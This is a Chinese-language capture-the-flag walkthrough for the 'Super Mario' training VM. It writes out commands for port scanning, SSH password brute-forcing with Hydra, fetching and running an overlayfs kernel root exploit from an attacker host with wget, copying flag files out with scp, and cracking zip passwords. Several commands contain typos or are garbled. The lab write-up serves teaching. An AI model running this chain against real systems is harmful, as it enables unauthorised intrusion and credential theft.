Hack童年遊戲超級馬里奧，看你能否成功奪旗

相信很多人童年時都玩過超級馬里奧這款遊戲，不知各位腦海中是否曾閃過黑一下這款遊戲的念頭？現在我們不妨一試。如需下載超級馬里奧新虛擬機，請點擊此處。

該虛擬機是由Mr_h4sh開發的，作為對黑客的挑戰，其中隱藏了兩面旗。挑戰級別為中級。

現在我們正式開始！

如你所知，我們總是從枚舉開始，因此，在你的kali Linux中打開終端，用nmap大肆掃描吧。

nmap –p- -A 192.168.0.5

因為埠22和埠8180分別用於服務SSH和HTTP，因此我選擇埠8081進行枚舉，但從屏幕截圖可以看到，我沒有得到任何顯著的結果。

Dirb http://192.168.0.5:8180

然後我使用以下命令進行目錄暴力攻擊

Dirb http://192.168.0.5:8180 /usr/share/wordlists/dirb/big.txt

在下面的屏幕截圖中可以看到顯示了一個文件名vhosts，讓我們通過瀏覽器一探究竟。

現在在瀏覽器中瀏覽vhost，http://192.168.0.5:8180/vhosts中vhosts代表虛擬主機，其是在單個伺服器上託管多個域的方法。從Vhosts中我得知伺服器名稱是mario.supermariohost.local

我們將mario.supermariohost.local作為新的localhost添加到/etc

Cd etc

Vim hosts

現在在vim編輯器中鍵入「192.168.0.5 mario.supermariohost.local」，將其添加到/etc/host中，然後鍵入wq保存。

現在鍵入Cat hosts來檢查添加的主機名，從屏幕截圖可以看到其已成功添加到其中。

然後我在瀏覽器上訪問mario.supermariohost.local，最終作為瀏覽器遊戲獲得了馬里奧，但這並不起作用。

我們知道，埠22和8081是開放的，我們從埠8081的枚舉沒得到太多的信息。現在我們轉向埠22進行SSH枚舉，因此我準備了一個字典，以檢索登錄SSH伺服器的憑據。

字典包含用戶名（馬里奧的著名角色），你也可以從Google查找這些名稱。

在文本編輯器中鍵入以下名稱：Mario、luigi、peach、toad、yoshi，將文件作為user保存在桌面上。

使用john the ripper通過以下命令生成密碼字典，–rules將啟用wordlist，–stdout將定義要在桌面上作為通行證生成的密碼的固定長度。

John –wordlist : user –rules –stdout > pass

最終，我們獲得了名為user的用戶名字典和由john生成的作為通行證的密碼字典，現在我們必須匹配用戶和通行證的最佳組合，以檢索登錄SSH的憑據。我選擇hydra進行密碼破解，也可以選擇任何其他密碼破解工具。

Hydra –L user –P pass 192.168.0.5 ssh

從以下屏幕截圖可以看到SSH伺服器匹配的用戶名luigi和密碼luigi1的組合。

現在鍵入以下內容進行SSH登錄

Ssh luigi@192.168.0.5

Password luigi1

我們成功登錄了SSH伺服器。

Uname –a

現在我們知道了linux supermariohost的版本為3.13.0，我們在Google上看一下其漏洞利用方法。

是的，在ubuntu中有一個3.13.0 overlayfs本地root的漏洞利用方法，在你的kali Linux中點擊此處下載。

從截圖可以看到，我下載了利用方法，保存為Mario.c，以進行許可權提升。

現在鍵入以下命令，以在目標系統中下載Mario.c。

wget http://192.168.0.6/mario.c

該文件被成功下載，現在鍵入另一個命令來編譯Mario.c

gcc Mario.c -o Mario

./Mario

Id

Cd/root

Ls

太棒了！ 我們獲得了root許可權，從屏幕截圖可以看到，在其目錄中我獲得了名為flag.zip的zip文件

現在輸入以下命令在你的kali Linux桌面上下載flag.zip

scp /root/flag.ziproot@192.168.0.6:/root/Desktop

Fcrackzip flag.zip –D –P /user/share/wordlist/rockyou.txt –u

如屏幕截圖中所示，密碼已找到！pw ==ilovepeach，現在可以使用此密碼解壓縮你的文件。

解壓縮flag.zip

其會要求密碼，提供以上密碼進行解壓縮，從圖片中可以看到，其包含flag.txt

Cat flag.txt

第一面旗：如果你達到這一步，意味著你獲得了root許可權，恭喜。

現在遵循以下步驟完成另一個挑戰。

Iptables –L

從屏幕截圖可以看到，一個新的網路已被添加到遠程系統上。

arp –n

現在目標系統已經轉發了一個新的IP 192.168.122.112

Ls –la

找到了一個目錄.bak

Cd /.bak

Ls

Cd users

Cd luigi

Ls

裡面有兩個文件，我們來逐個讀取。

Cat消息

Hi Luigi，

Since
you』ve been messing around with my host, at this point I want to return
the favour. This is a 「war」, you 「naughty」
boy!（你一直在我的主機中瞎搞，這時候我要給你點回報，這是一場戰爭，你這個淘氣鬼。）

cat id_rsa.pub

給定文本中突出顯示的文字可能看起來像登錄SSH伺服器的用戶名。

我們通過登錄到ssh -i id_rsa warluigi@192.168.1.122.112確定

太好了，所有假設都得到了肯定的結果

再次檢查內核版本

uname –a

太好了，是相同的版本，我們可以使用我們的Mario.c利用方法獲得root許可權。因此如圖所示重複上述步驟。

Wgethttp://192.168.0.6/maio.c

該文件成功下載，現在鍵入另一個命令來編譯Mario.c

Gcc Mario.c –o Mario

./Mario

Id

Cd /root

Ls –la

此處我找到了兩個重要的文件，第一個是hint.txt，第二個是flag2.zip，在解壓縮flag.zip前，我們必須看看hint.txt文件。

Cat .hint.txt

「Peach Loves Me」可能是解密flag2.zip文件的密碼

現在我們再次使用以下命令在kali Linux的桌面上下載fla2g.zip

Scp /root/flag2.ziproot@192.168.0.6:/root/Desktop

解壓flag2.zip

要求密碼時鍵入「Peach Loves Me」

其中包含flag2.txt，鍵入cat flag2.txt來打開該文件。

第二面旗：恭喜你奪下第二面旗！

太棒了，我們成功奪下了兩面旗

本文編譯：華為未然實驗室

喜歡這篇文章嗎？立刻分享出去讓更多人知道吧！